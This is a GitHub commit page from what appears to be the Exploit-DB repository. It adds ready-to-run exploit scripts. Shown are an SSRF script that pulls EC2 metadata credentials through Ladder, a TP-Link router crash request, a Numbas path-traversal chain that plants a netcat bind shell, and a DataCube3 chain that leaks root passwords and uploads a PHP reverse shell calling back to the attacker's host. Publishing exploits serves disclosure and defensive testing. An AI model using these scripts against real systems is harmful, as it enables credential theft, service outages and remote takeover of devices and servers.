Skip to content

Commit

Permalink
DB: 2024-03-11
Browse files Browse the repository at this point in the history 
7 changes to exploits/shellcodes/ghdb

Ladder v0.0.21 - Server-side request forgery (SSRF)

TP-Link TL-WR740N - Buffer Overflow 'DOS'

Numbas < v7.3 - Remote Code Execution

Akaunting < 3.1.3 - RCE

DataCube3 v1.0 - Unrestricted file upload 'RCE'

Hide My WP < 6.2.9 - Unauthenticated SQLi
  • Loading branch information
Exploit-DB committed Mar 11, 2024
1 parent 0af7c5d commit 60a90af
Show file tree
Hide file tree
Showing 7 changed files with 537 additions and 0 deletions.
18 changes: 18 additions & 0 deletions exploits/go/webapps/51869.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
# Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
# Date: 2024-01-20
# Exploit Author: @_chebuya
# Software Link: https://github.com/everywall/ladder
# Version: v0.0.1 - v0.0.21
# Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
# CVE: CVE-2024-27620
# Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context. An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs

import requests
import json

target_url = "http://127.0.0.1:8080/api/"
imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"

r = requests.get(target_url + imdsv1_url)
response_json = json.loads(r.text)
print(response_json["body"])
58 changes: 58 additions & 0 deletions exploits/hardware/webapps/51866.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,58 @@
# Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
# Date: 8/12/2023
# Exploit Author: Anish Feroz (ZEROXINN)
# Vendor Homepage: http://www.tp-link.com
# Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
# Tested on: TP-Link TL-WR740N

#Description:

#There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.

#Usage:

#python3 target username password
#change port, if required

------------------------------------------------POC-----------------------------------------

#!/usr/bin/python

import requests
from requests.auth import HTTPBasicAuth
import base64

def send_request(ip, username, password):
auth_url = f"http://{ip}:8082"
target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"

credentials = f"{username}:{password}"
encoded_credentials = base64.b64encode(credentials.encode()).decode()

headers = {
"Host": f"{ip}:8082",
"Authorization": f"Basic {encoded_credentials}",
"Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "en-US,en;q=0.9",
"Connection": "close"
}

session = requests.Session()

response = session.get(target_url, headers=headers)

if response.status_code == 200:
print("Server Crashed")
print(response.text)
else:
print(f"Script Completed with status code {response.status_code}")

ip_address = input("Enter IP address of the host: ")
username = input("Enter username: ")
password = input("Enter password: ")

send_request(ip_address, username, password)
167 changes: 167 additions & 0 deletions exploits/nodejs/webapps/51867.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,167 @@
# Exploit Title: Numbas < v7.3 - Remote Code Execution
# Google Dork: N/A
# Date: March 7th, 2024
# Exploit Author: Matheus Boschetti
# Vendor Homepage: https://www.numbas.org.uk/
# Software Link: https://github.com/numbas/Numbas
# Version: 7.2 and below
# Tested on: Linux
# CVE: CVE-2024-27612

import sys, requests, re, argparse, subprocess, time
from bs4 import BeautifulSoup

s = requests.session()

def getCSRF(target):
url = f"http://{target}/"
req = s.get(url)
soup = BeautifulSoup(req.text, 'html.parser')
csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
return csrfmiddlewaretoken

def createTheme(target):
# Format request
csrfmiddlewaretoken = getCSRF(target)
theme = 'ExampleTheme'
boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
data = (
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
'\r\n'
f'{csrfmiddlewaretoken}\r\n'
f'--{boundary}\r\n'
'Content-Disposition: form-data; name="name"\r\n'
'\r\n'
f'{theme}\r\n'
f'--{boundary}--\r\n'
)
headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
'User-Agent': 'Mozilla/5.0',
'Accept': '*/*',
'Connection': 'close'}

# Create theme and return its ID
req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
redir = req.url
split = redir.split('/')
id = split[4]
print(f"\t[i] Theme created with ID {id}")
return id

def login(target, user, passwd):
print("\n[i] Attempting to login...")

csrfmiddlewaretoken = getCSRF(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'username': user,
'password': passwd,
'next': '/'}

# Login
login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
res = login.text
if("Logged in as" not in res):
print("\n\n[!] Login failed!")
sys.exit(-1)

# Check if logged and fetch ID
usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
if usermatch:
user = usermatch.group(1)
idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
if idmatch:
id = idmatch.group(1)
print(f"\t[+] Logged in as \"{user}\" with ID {id}")

def checkVuln(url):
print("[i] Checking if target is vulnerable...")

# Attempt to read files
themeID = createTheme(url)
target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
hname = s.get(f"{target}/etc/hostname")
ver = s.get(f"{target}/etc/issue")
hnamesoup = BeautifulSoup(hname.text, 'html.parser')
versoup = BeautifulSoup(ver.text, 'html.parser')
hostname = hnamesoup.find('textarea').get_text().strip()
version = versoup.find('textarea').get_text().strip()
if len(hostname) < 1:
print("\n\n[!] Something went wrong - target might not be vulnerable.")
sys.exit(-1)
print(f"\n[+] Target \"{hostname}\" is vulnerable!")
print(f"\t[i] Running: \"{version}\"")

# Cleanup - delete theme
print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
target = f"http://{url}/themes/{themeID}/delete"
csrfmiddlewaretoken = getCSRF(url)
data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
s.post(target, data=data)


def replaceInit(target):
# Overwrite __init__.py with arbitrary code
rport = '8443'
payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
csrfmiddlewaretoken = getCSRF(target)
filename = '../../../../numbas_editor/numbas/__init__.py'
themeID = createTheme(target)
data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
'source': payload,
'filename': filename}

print("[i] Delivering payload...")
# Retry 5 times in case something goes wrong...
for attempt in range(5):
try:
s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
except Exception as e:
pass

# Establish connection to bind shell
time.sleep(2)
print(f"\t[+] Payload delivered, establishing connection...\n")
if ":" in target:
split = target.split(":")
ip = split[0]
else:
ip = str(target)
subprocess.Popen(["nc", "-n", ip, rport])
while True:
pass


def main():
parser = argparse.ArgumentParser()
if len(sys.argv) <= 1:
print("\n[!] No option provided!")
print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
sys.exit(-1)

group = parser.add_mutually_exclusive_group(required=True)
group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
parser.add_argument('--target', help='Target IP:PORT')
parser.add_argument('--user', help='Username to authenticate')
parser.add_argument('--passwd', help='Password to authenticate')
args = parser.parse_args()
action = args.action
target = args.target
user = args.user
passwd = args.passwd

print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")

if action == 'check':
login(target, user, passwd)
checkVuln(target)
elif action == 'exploit':
login(target, user, passwd)
replaceInit(target)
else:
sys.exit(-1)


if __name__ == "__main__":
main()
145 changes: 145 additions & 0 deletions exploits/php/webapps/51868.txt
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,145 @@
# Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
# Date: 7/28/2022
# Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
# Vendor Homepage: https://www.f-logic.jp
# Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
# Version: Ver1.0
# Tested on: DataCube3 version 1.0 (Ubuntu)
# CVE : CVE-2024-25830 + CVE-2024-25832

# Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import json
import urllib3
import re
urllib3.disable_warnings()

def banner():
dataCube3Logo = """
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ DataCube3 Ver1.0 █F-logic▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒████▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ████ ████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒▒▒██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ ██ ██ ██▓▓████▓▓
▒▒▒▒▒▒▒▒██ █████████████████ ██▓▓▓▓▓▓▓▓
▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓

\033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
FOR EDUCATIONAL PURPOSE ONLY.
"""
return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))


def extractRootPwd(RHOST, RPORT, protocol):
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
adminPassword = jsonLeakedData[12]['value']
rootPassword = jsonLeakedData[14]['value']
print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
return rootPassword
except:
print('[ERROR] Can\'t grab the DataCube3 version...')


def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
print('[INFO] Generating DataCube3 auth cookie ...')
url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
data = {
'user_id': 'root',
'user_pw': rootPassword,
'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
}
try:
response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
exit()
authCookie = response.cookies.get_dict()
print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
return authCookie
except:
print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')


def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
print('[INFO] Extracting Accesstime ...')
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
exit()
soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
print('[INFO] AccessTime value: {}'.format(accessTime))
return accessTime
except:
print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')


def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
print('[INFO] Injecting PHP reverse shell script ...')
filename='rvs.php'
payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)

data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå��ç��追å�\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)

headers = {
'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
}
url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
try:
response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
if response.status_code != 302:
print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
exit()
shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
return shellURL
except:
print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')


def execReverseShell(shellURL):
print('[INFO] Executing reverse shell...')
try:
response = requests.get(shellURL, allow_redirects=False, verify=False)
print('[INFO] Reverse shell successfully executed.')
return
except Exception as e:
print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
return False


def main():
banner()
args = parser.parse_args()
protocol = 'https' if args.RPORT == 443 else 'http'
rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
execReverseShell(shellURL)


if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
main()
Loading

0 comments on commit 60a90af

Please sign in to comment.